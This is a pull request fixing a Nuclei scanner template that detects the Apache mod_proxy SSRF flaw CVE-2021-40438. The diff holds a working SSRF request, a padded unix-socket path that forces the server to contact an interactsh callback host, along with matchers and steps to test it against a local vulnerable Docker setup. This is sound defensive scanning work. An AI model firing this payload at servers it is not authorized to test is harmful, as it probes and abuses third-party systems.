### PR TITLE
Fix CVE-2021-40438.yaml

### DIFF
--- a/http/cves/2021/CVE-2021-40438.yaml
+++ b/http/cves/2021/CVE-2021-40438.yaml
@@ -21,7 +21,7 @@ info:
     epss-percentile: 0.99749
     cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 2
+    max-request: 1
     vendor: apache
     product: http_server
   tags: cve2021,cve,ssrf,apache,mod-proxy,kev
@@ -29,15 +29,12 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{randbase(5)}}.com/'
-      - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://oast.pro/'
+      - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/'
 
     host-redirects: true
     max-redirects: 2
+
     matchers:
       - type: dsl
         dsl:
-          - "!contains(body_1, '<h1> Interactsh Server </h1>')"
-          - "contains(body_2, '<h1> Interactsh Server </h1>')"
-        condition: and
-# digest: 4a0a00473045022054595b49ba72d99512a0d6ea2cb09a8a9b17077a63d51b94d79025a970c5e470022100b3a313e154e44c770642e0e8874fb62257de71ab53059714c607ec9d2c13a4ed:922c64590222798bb761d5b6d8e72950
+          - contains(header_1, "X-Interactsh-Version")

--- a/http/cves/2021/CVE-2021-40438.yaml
+++ b/http/cves/2021/CVE-2021-40438.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-40438
 
 info:
-  name: Apache <= 2.4.48 - Mod_Proxy SSRF
+  name: Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery
   author: pdteam
   severity: critical
   description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
@@ -22,6 +22,7 @@ info:
     cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
   metadata:
     max-request: 1
+    verified: true
     vendor: apache
     product: http_server
   tags: cve2021,cve,ssrf,apache,mod-proxy,kev
@@ -37,4 +38,6 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - contains(header_1, "X-Interactsh-Version")
+          - 'contains_all(header, "X-Interactsh-Version", "Server: oast")'
+          - "!contains(body, '<h1> Interactsh Server </h1>')"
+        condition: and


### PR DESCRIPTION
Current implementation of vulnerability check does not detect vulnerable servers. 
Instead of making 2 requests i decided to make 1 request to randomised interactsh hostname and check response headers for X-Interactsh-Version

You can test and reproduce that current implementation fails and my PR works by utilising vulnerable docker server from:
https://github.com/ericmann/apache-cve-poc
```
git clone https://github.com/ericmann/apache-cve-poc.git
cd apache-cve-poc
docker-compose up
nuclei -id CVE-2021-40438 -debug -svd -u http://127.0.0.1:8000/
```
### Template / PR Information

- Fixed CVE-2021-40438

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO
